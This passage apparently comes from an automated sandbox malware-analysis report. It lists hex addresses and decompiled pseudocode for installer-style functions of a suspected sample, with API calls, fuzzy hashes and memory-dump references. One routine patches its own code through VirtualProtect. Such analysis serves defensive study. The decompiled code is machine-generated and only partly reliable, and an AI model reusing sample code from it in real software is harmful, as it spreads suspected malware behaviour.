                                                                                                                          0x00000000
                                                                                                                          0x0040646e
                                                                                                                          0x00000000
                                                                                                                          0x0040646e
                                                                                                                          0x00000000
                                                                                                                          0x004066fb
                                                                                                                          0x004066fb
                                                                                                                          0x004066ff
                                                                                                                          0x00406a26
                                                                                                                          0x00000000
                                                                                                                          0x00406a26
                                                                                                                          0x00406705
                                                                                                                          0x00406708
                                                                                                                          0x0040670b
                                                                                                                          0x0040670f
                                                                                                                          0x00406712
                                                                                                                          0x00406718
                                                                                                                          0x0040671a
                                                                                                                          0x0040671a
                                                                                                                          0x0040671a
                                                                                                                          0x0040671d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004064cb
                                                                                                                          0x004064cb
                                                                                                                          0x004064ce
                                                                                                                          0x00406840
                                                                                                                          0x00406840
                                                                                                                          0x00000000
                                                                                                                          0x00406840
                                                                                                                          0x00000000
                                                                                                                          0x0040680a
                                                                                                                          0x0040680e
                                                                                                                          0x00406830
                                                                                                                          0x00406833
                                                                                                                          0x0040683d
                                                                                                                          0x00406840
                                                                                                                          0x00406840
                                                                                                                          0x00000000
                                                                                                                          0x00406840
                                                                                                                          0x00406840
                                                                                                                          0x00406810
                                                                                                                          0x00406813
                                                                                                                          0x00406817
                                                                                                                          0x0040681a
                                                                                                                          0x0040681a
                                                                                                                          0x0040681d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004068c7
                                                                                                                          0x004068cb
                                                                                                                          0x004068e9
                                                                                                                          0x004068e9
                                                                                                                          0x004068e9
                                                                                                                          0x004068f0
                                                                                                                          0x004068f7
                                                                                                                          0x004068fe
                                                                                                                          0x004068fe
                                                                                                                          0x00000000
                                                                                                                          0x004068fe
                                                                                                                          0x004068cd
                                                                                                                          0x004068d0
                                                                                                                          0x004068d3
                                                                                                                          0x004068d6
                                                                                                                          0x004068dd
                                                                                                                          0x00406821
                                                                                                                          0x00406821
                                                                                                                          0x00406824
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004069b8
                                                                                                                          0x004069bb
                                                                                                                          0x004068bc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004065f2
                                                                                                                          0x004065f4
                                                                                                                          0x004065fb
                                                                                                                          0x004065fc
                                                                                                                          0x004065fe
                                                                                                                          0x00406601
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406609
                                                                                                                          0x0040660c
                                                                                                                          0x0040660f
                                                                                                                          0x00406611
                                                                                                                          0x00406613
                                                                                                                          0x00406613
                                                                                                                          0x00406614
                                                                                                                          0x00406617
                                                                                                                          0x0040661e
                                                                                                                          0x00406621
                                                                                                                          0x0040662f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406905
                                                                                                                          0x00406905
                                                                                                                          0x00406908
                                                                                                                          0x0040690f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406914
                                                                                                                          0x00406914
                                                                                                                          0x00406918
                                                                                                                          0x00406a50
                                                                                                                          0x00000000
                                                                                                                          0x00406a50
                                                                                                                          0x0040691e
                                                                                                                          0x00406921
                                                                                                                          0x00406924
                                                                                                                          0x00406928
                                                                                                                          0x0040692b
                                                                                                                          0x00406931
                                                                                                                          0x00406933
                                                                                                                          0x00406933
                                                                                                                          0x00406933
                                                                                                                          0x00406936
                                                                                                                          0x00406939
                                                                                                                          0x00406939
                                                                                                                          0x00406939
                                                                                                                          0x00406939
                                                                                                                          0x0040693c
                                                                                                                          0x0040693c
                                                                                                                          0x00406940
                                                                                                                          0x004069a0
                                                                                                                          0x004069a3
                                                                                                                          0x004069a8
                                                                                                                          0x004069a9
                                                                                                                          0x004069ab
                                                                                                                          0x004069ad
                                                                                                                          0x004069b0
                                                                                                                          0x004068bc
                                                                                                                          0x004068bc
                                                                                                                          0x00000000
                                                                                                                          0x004068c2
                                                                                                                          0x004068bc
                                                                                                                          0x00406942
                                                                                                                          0x00406948
                                                                                                                          0x0040694b
                                                                                                                          0x0040694e
                                                                                                                          0x00406951
                                                                                                                          0x00406954
                                                                                                                          0x00406957
                                                                                                                          0x0040695a
                                                                                                                          0x0040695d
                                                                                                                          0x00406960
                                                                                                                          0x00406963
                                                                                                                          0x0040697c
                                                                                                                          0x0040697f
                                                                                                                          0x00406982
                                                                                                                          0x00406985
                                                                                                                          0x00406989
                                                                                                                          0x0040698b
                                                                                                                          0x0040698b
                                                                                                                          0x0040698c
                                                                                                                          0x0040698f
                                                                                                                          0x00406965
                                                                                                                          0x00406965
                                                                                                                          0x0040696d
                                                                                                                          0x00406972
                                                                                                                          0x00406974
                                                                                                                          0x00406977
                                                                                                                          0x00406977
                                                                                                                          0x00406992
                                                                                                                          0x00406999
                                                                                                                          0x00000000
                                                                                                                          0x0040699b
                                                                                                                          0x00000000
                                                                                                                          0x0040699b
                                                                                                                          0x00000000
                                                                                                                          0x00406637
                                                                                                                          0x0040663a
                                                                                                                          0x00406670
                                                                                                                          0x004067a0
                                                                                                                          0x004067a0
                                                                                                                          0x004067a0
                                                                                                                          0x004067a0
                                                                                                                          0x004067a3
                                                                                                                          0x004067a3
                                                                                                                          0x004067a6
                                                                                                                          0x004067a8
                                                                                                                          0x00406a32
                                                                                                                          0x00000000
                                                                                                                          0x00406a32
                                                                                                                          0x004067ae
                                                                                                                          0x004067b1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067b7
                                                                                                                          0x004067bb
                                                                                                                          0x004067be
                                                                                                                          0x004067be
                                                                                                                          0x004067be
                                                                                                                          0x00000000
                                                                                                                          0x004067be
                                                                                                                          0x0040663c
                                                                                                                          0x0040663e
                                                                                                                          0x00406640
                                                                                                                          0x00406642
                                                                                                                          0x00406645
                                                                                                                          0x00406646
                                                                                                                          0x00406648
                                                                                                                          0x0040664a
                                                                                                                          0x0040664d
                                                                                                                          0x00406650
                                                                                                                          0x00406666
                                                                                                                          0x0040666b
                                                                                                                          0x004066a3
                                                                                                                          0x004066a3
                                                                                                                          0x004066a7
                                                                                                                          0x004066d3
                                                                                                                          0x004066d5
                                                                                                                          0x004066dc
                                                                                                                          0x004066df
                                                                                                                          0x004066e2
                                                                                                                          0x004066e2
                                                                                                                          0x004066e7
                                                                                                                          0x004066e7
                                                                                                                          0x004066e9
                                                                                                                          0x004066ec
                                                                                                                          0x004066f3
                                                                                                                          0x004066f6
                                                                                                                          0x00406723
                                                                                                                          0x00406723
                                                                                                                          0x00406726
                                                                                                                          0x00406729
                                                                                                                          0x0040679d
                                                                                                                          0x0040679d
                                                                                                                          0x0040679d
                                                                                                                          0x00000000
                                                                                                                          0x0040679d
                                                                                                                          0x0040672b
                                                                                                                          0x00406731
                                                                                                                          0x00406734
                                                                                                                          0x00406737
                                                                                                                          0x0040673a
                                                                                                                          0x0040673d
                                                                                                                          0x00406740
                                                                                                                          0x00406743
                                                                                                                          0x00406746
                                                                                                                          0x00406749
                                                                                                                          0x0040674c
                                                                                                                          0x00406765
                                                                                                                          0x00406767
                                                                                                                          0x0040676a
                                                                                                                          0x0040676b
                                                                                                                          0x0040676e
                                                                                                                          0x00406770
                                                                                                                          0x00406773
                                                                                                                          0x00406775
                                                                                                                          0x00406777
                                                                                                                          0x0040677a
                                                                                                                          0x0040677c
                                                                                                                          0x0040677f
                                                                                                                          0x00406783
                                                                                                                          0x00406785
                                                                                                                          0x00406785
                                                                                                                          0x00406786
                                                                                                                          0x00406789
                                                                                                                          0x0040678c
                                                                                                                          0x0040674e
                                                                                                                          0x0040674e
                                                                                                                          0x00406756
                                                                                                                          0x0040675b
                                                                                                                          0x0040675d
                                                                                                                          0x00406760
                                                                                                                          0x00406760
                                                                                                                          0x0040678f
                                                                                                                          0x00406796
                                                                                                                          0x00406720
                                                                                                                          0x00406720
                                                                                                                          0x00406720
                                                                                                                          0x00406720
                                                                                                                          0x00000000
                                                                                                                          0x00406798
                                                                                                                          0x00000000
                                                                                                                          0x00406798
                                                                                                                          0x00406796
                                                                                                                          0x004066a9
                                                                                                                          0x004066ac
                                                                                                                          0x004066ae
                                                                                                                          0x004066b1
                                                                                                                          0x004066b4
                                                                                                                          0x004066b7
                                                                                                                          0x004066b9
                                                                                                                          0x004066bc
                                                                                                                          0x004066bf
                                                                                                                          0x004066bf
                                                                                                                          0x004066c2
                                                                                                                          0x004066c2
                                                                                                                          0x004066c5
                                                                                                                          0x004066cc
                                                                                                                          0x004066a0
                                                                                                                          0x004066a0
                                                                                                                          0x004066a0
                                                                                                                          0x004066a0
                                                                                                                          0x00000000
                                                                                                                          0x004066ce
                                                                                                                          0x00000000
                                                                                                                          0x004066ce
                                                                                                                          0x004066cc
                                                                                                                          0x00406652
                                                                                                                          0x00406655
                                                                                                                          0x00406657
                                                                                                                          0x0040665a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004063b9
                                                                                                                          0x004063b9
                                                                                                                          0x004063bd
                                                                                                                          0x00406a02
                                                                                                                          0x00000000
                                                                                                                          0x00406a02
                                                                                                                          0x004063c3
                                                                                                                          0x004063c6
                                                                                                                          0x004063c9
                                                                                                                          0x004063cc
                                                                                                                          0x004063cf
                                                                                                                          0x004063d2
                                                                                                                          0x004063d5
                                                                                                                          0x004063d7
                                                                                                                          0x004063da
                                                                                                                          0x004063dd
                                                                                                                          0x004063e0
                                                                                                                          0x004063e2
                                                                                                                          0x004063e2
                                                                                                                          0x004063e2
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406544
                                                                                                                          0x00406544
                                                                                                                          0x00406548
                                                                                                                          0x00406a0e
                                                                                                                          0x00000000
                                                                                                                          0x00406a0e
                                                                                                                          0x0040654e
                                                                                                                          0x00406551
                                                                                                                          0x00406554
                                                                                                                          0x00406557
                                                                                                                          0x00406559
                                                                                                                          0x00406559
                                                                                                                          0x00406559
                                                                                                                          0x0040655c
                                                                                                                          0x0040655f
                                                                                                                          0x00406562
                                                                                                                          0x00406565
                                                                                                                          0x00406568
                                                                                                                          0x0040656b
                                                                                                                          0x0040656c
                                                                                                                          0x0040656e
                                                                                                                          0x0040656e
                                                                                                                          0x0040656e
                                                                                                                          0x00406571
                                                                                                                          0x00406574
                                                                                                                          0x00406577
                                                                                                                          0x0040657a
                                                                                                                          0x0040657a
                                                                                                                          0x0040657a
                                                                                                                          0x0040657d
                                                                                                                          0x0040657f
                                                                                                                          0x0040657f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067c1
                                                                                                                          0x004067c1
                                                                                                                          0x004067c1
                                                                                                                          0x004067c5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067cb
                                                                                                                          0x004067ce
                                                                                                                          0x004067d1
                                                                                                                          0x004067d4
                                                                                                                          0x004067d6
                                                                                                                          0x004067d6
                                                                                                                          0x004067d6
                                                                                                                          0x004067d9
                                                                                                                          0x004067dc
                                                                                                                          0x004067df
                                                                                                                          0x004067e2
                                                                                                                          0x004067e5
                                                                                                                          0x004067e8
                                                                                                                          0x004067e9
                                                                                                                          0x004067eb
                                                                                                                          0x004067eb
                                                                                                                          0x004067eb
                                                                                                                          0x004067ee
                                                                                                                          0x004067f1
                                                                                                                          0x004067f4
                                                                                                                          0x004067f7
                                                                                                                          0x004067fa
                                                                                                                          0x004067fe
                                                                                                                          0x00406800
                                                                                                                          0x00406803
                                                                                                                          0x00000000
                                                                                                                          0x00406805
                                                                                                                          0x00406582
                                                                                                                          0x00406582
                                                                                                                          0x00000000
                                                                                                                          0x00406582
                                                                                                                          0x00406803
                                                                                                                          0x00406a38
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406067
                                                                                                                          0x00406a6f
                                                                                                                          0x00406a6f
                                                                                                                          0x00000000
                                                                                                                          0x00406a6f
                                                                                                                          0x004068bc
                                                                                                                          0x00406843
                                                                                                                          0x00406840

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                                                                                                                          • Instruction ID: 5a6a632b4197b5bad3eb6902eefc8e88da0621a447eca7476662d6aa47a1fed0
                                                                                                                          • Opcode Fuzzy Hash: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                                                                                                                          • Instruction Fuzzy Hash: 93714571E00228CFEF28DF98C8547ADBBB1FB44305F15816AD916BB281C7789A56DF44
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401B23, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 59%
                                                                                                                          			E00401B23(void* __ebx, void* __edx) {
				intOrPtr _t7;
				void* _t8;
				void _t11;
				void* _t13;
				void* _t21;
				void* _t24;
				void* _t30;
				void* _t33;
				void* _t34;
				void* _t37;

				_t27 = __ebx;
				_t7 =  *((intOrPtr*)(_t37 - 0x20));
				_t30 =  *0x40b010; // 0x0
				if(_t7 == __ebx) {
					if(__edx == __ebx) {
						_t8 = GlobalAlloc(0x40, 0x404); // executed
						_t34 = _t8;
						_t4 = _t34 + 4; // 0x4
						E00405BBA(__ebx, _t30, _t34, _t4,  *((intOrPtr*)(_t37 - 0x28)));
						_t11 =  *0x40b010; // 0x0
						 *_t34 = _t11;
						 *0x40b010 = _t34;
					} else {
						if(_t30 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t2 = _t30 + 4; // 0x4
							E00405B98(_t33, _t2);
							_push(_t30);
							 *0x40b010 =  *_t30;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t7 = _t7 - 1;
						if(_t30 == _t27) {
							break;
						}
						_t30 =  *_t30;
						if(_t7 != _t27) {
							continue;
						} else {
							if(_t30 == _t27) {
								break;
							} else {
								_t32 = _t30 + 4;
								E00405B98(0x409c10, _t30 + 4);
								_t21 =  *0x40b010; // 0x0
								E00405B98(_t32, _t21 + 4);
								_t24 =  *0x40b010; // 0x0
								_push(0x409c10);
								_push(_t24 + 4);
								E00405B98();
								L15:
								 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t37 - 4));
								_t13 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E00405BBA(_t27, _t30, _t33, _t27, 0xffffffe8));
					E00405459();
					_t13 = 0x7fffffff;
				}
				L17:
				return _t13;
			}













                                                                                                                          0x00401b23
                                                                                                                          0x00401b23
                                                                                                                          0x00401b26
                                                                                                                          0x00401b2e
                                                                                                                          0x00401b76
                                                                                                                          0x00401ba4
                                                                                                                          0x00401bad
                                                                                                                          0x00401baf
                                                                                                                          0x00401bb3
                                                                                                                          0x00401bb8
                                                                                                                          0x00401bbd
                                                                                                                          0x00401bbf
                                                                                                                          0x00401b78
                                                                                                                          0x00401b7a
                                                                                                                          0x0040268f
                                                                                                                          0x00401b80
                                                                                                                          0x00401b80
                                                                                                                          0x00401b85
                                                                                                                          0x00401b8c
                                                                                                                          0x00401b8d
                                                                                                                          0x00401b92
                                                                                                                          0x00401b92
                                                                                                                          0x00401b7a
                                                                                                                          0x00000000
                                                                                                                          0x00401b30
                                                                                                                          0x00401b30
                                                                                                                          0x00401b30
                                                                                                                          0x00401b33
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00401b39
                                                                                                                          0x00401b3d
                                                                                                                          0x00000000
                                                                                                                          0x00401b3f
                                                                                                                          0x00401b41
                                                                                                                          0x00000000
                                                                                                                          0x00401b47
                                                                                                                          0x00401b47
                                                                                                                          0x00401b51
                                                                                                                          0x00401b56
                                                                                                                          0x00401b60
                                                                                                                          0x00401b65
                                                                                                                          0x00401b6a
                                                                                                                          0x00401b6e
                                                                                                                          0x004027e4
                                                                                                                          0x004028be
                                                                                                                          0x004028c1
                                                                                                                          0x004028c7
                                                                                                                          0x004028c7
                                                                                                                          0x00401b41
                                                                                                                          0x00000000
                                                                                                                          0x00401b3d
                                                                                                                          0x0040222e
                                                                                                                          0x0040223b
                                                                                                                          0x0040223c
                                                                                                                          0x00402241
                                                                                                                          0x00402241
                                                                                                                          0x004028c9
                                                                                                                          0x004028cd

                                                                                                                          APIs
                                                                                                                          • GlobalFree.KERNEL32 ref: 00401B92
                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401BA4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$AllocFree
                                                                                                                          • String ID: Call
                                                                                                                          • API String ID: 3394109436-1824292864
                                                                                                                          • Opcode ID: f781670e25a6e7b52d9f941d0c48a449cb08d7ed30872f1273f2df5d5f18393b
                                                                                                                          • Instruction ID: 7ccf98c2bcd9f3ca38d4d46a4d581d89e530cf77c0bcd4a38c60e2ffc0b0a282
                                                                                                                          • Opcode Fuzzy Hash: f781670e25a6e7b52d9f941d0c48a449cb08d7ed30872f1273f2df5d5f18393b
                                                                                                                          • Instruction Fuzzy Hash: CD219376A00104ABDB20EF94DE84A9F73B5EB45314720493BF611B33D1E7B8B9819B5D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10002910, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x10004038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x1000404c, 4, 0x40, 0x1000403c); // executed
					 *0x1000404c = 0xc2;
					 *0x1000403c = 0;
					 *0x10004044 = 0;
					 *0x10004054 = 0;
					 *0x10004048 = 0;
					 *0x10004040 = 0;
					 *0x1000404e = 0;
				}
				return 1;
			}



                                                                                                                          0x10002919
                                                                                                                          0x1000291e
                                                                                                                          0x1000292e
                                                                                                                          0x10002936
                                                                                                                          0x1000293d
                                                                                                                          0x10002942
                                                                                                                          0x10002947
                                                                                                                          0x1000294c
                                                                                                                          0x10002951
                                                                                                                          0x10002956
                                                                                                                          0x10002956
                                                                                                                          0x1000295e

                                                                                                                          APIs
                                                                                                                          • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 1000292E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.335998522.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.335961527.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.336004505.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.336018222.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: ProtectVirtual
                                                                                                                          • String ID: `gxt
                                                                                                                          • API String ID: 544645111-3883184993
                                                                                                                          • Opcode ID: 34d967791fa0c81937acb5e832d60935bd6fac481f559dacb71f15d92aed8369
                                                                                                                          • Instruction ID: 9c362bd89546411511ea43e0443ad1e83f8bc8cc053274edabd49a87c402c727
                                                                                                                          • Opcode Fuzzy Hash: 34d967791fa0c81937acb5e832d60935bd6fac481f559dacb71f15d92aed8369
                                                                                                                          • Instruction Fuzzy Hash: 01E0C2F15092A1DEF360DF688CC47023FE4E3983C5B03842AE348F7269EB3841448B19
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1000120C, Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateFileA.KERNELBASE(00000000), ref: 100012CB
                                                                                                                          • GetLastError.KERNEL32 ref: 100013D2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.335998522.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.335961527.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.336004505.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.336018222.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateErrorFileLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1214770103-0
                                                                                                                          • Opcode ID: fc2908a5ce4c5ea6b7ff2785053878c0e954b60f992c9b301058c9b268dca91a
                                                                                                                          • Instruction ID: 2ceb6a4c5a853c59d91dd8515f1a4a6dd57fa9937a89c7e76f3007f89b0e2592
                                                                                                                          • Opcode Fuzzy Hash: fc2908a5ce4c5ea6b7ff2785053878c0e954b60f992c9b301058c9b268dca91a
                                                                                                                          • Instruction Fuzzy Hash: A05192F6904214DFFB20EFA4D9C279977A8EB443D4F21842AEA04E721DDB34A9808B55
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 69%
                                                                                                                          			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423f70;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42372c =  *0x42372c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42372c, 0x7530,  *0x423714), 0);
					}
				}
				return 0;
			}











                                                                                                                          0x0040138a
                                                                                                                          0x004013fa
                                                                                                                          0x0040139b
                                                                                                                          0x004013a0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004013a2
                                                                                                                          0x004013a3
                                                                                                                          0x004013ad
                                                                                                                          0x00000000
                                                                                                                          0x00401404
                                                                                                                          0x004013b0
                                                                                                                          0x004013b7
                                                                                                                          0x004013bd
                                                                                                                          0x004013be
                                                                                                                          0x004013c0
                                                                                                                          0x004013c2
                                                                                                                          0x004013b9
                                                                                                                          0x004013b9
                                                                                                                          0x004013ba
                                                                                                                          0x004013ba
                                                                                                                          0x004013c9
                                                                                                                          0x004013cb
                                                                                                                          0x004013f4
                                                                                                                          0x004013f4
                                                                                                                          0x004013c9
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                          • SendMessageA.USER32(00000020,00000402,00000000), ref: 004013F4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3850602802-0
                                                                                                                          • Opcode ID: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                                                                                                                          • Instruction ID: 9ae17229e6d33b90ed82c987c6c55cbce7d6b2b41e99f766f3e5bcfc28262e64
                                                                                                                          • Opcode Fuzzy Hash: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                                                                                                                          • Instruction Fuzzy Hash: CA014472B242109BEB184B389C04B2A32A8E710319F10813BF841F72F1D638CC028B4D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00405F28, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405F28(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409208);
				_t5 = GetModuleHandleA( *(_t10 + 0x409208));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40920c));
				}
				_t5 = E00405EBA(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                                                                          0x00405f30
                                                                                                                          0x00405f33
                                                                                                                          0x00405f3a
                                                                                                                          0x00405f42
                                                                                                                          0x00405f4e
                                                                                                                          0x00000000
                                                                                                                          0x00405f55
                                                                                                                          0x00405f45
                                                                                                                          0x00405f4c
                                                                                                                          0x00000000
                                                                                                                          0x00405f5d
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                                                                                                            • Part of subcall function 00405EBA: GetSystemDirectoryA.KERNEL32 ref: 00405ED1
                                                                                                                            • Part of subcall function 00405EBA: wsprintfA.USER32 ref: 00405F0A
                                                                                                                            • Part of subcall function 00405EBA: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F1E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2547128583-0
                                                                                                                          • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                                                                                          • Instruction ID: ae0a47d2ae808e9ad23d4e83699500a4151a320e34d6f574464110b7e3b32053
                                                                                                                          • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                                                                                          • Instruction Fuzzy Hash: 7AE08632A0951176D61097709D0496773ADDAC9740300087EF659F6181D738AC119E6D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040586F, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E0040586F(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                                                          0x00405873
                                                                                                                          0x00405880
                                                                                                                          0x00405895
                                                                                                                          0x0040589b

                                                                                                                          APIs
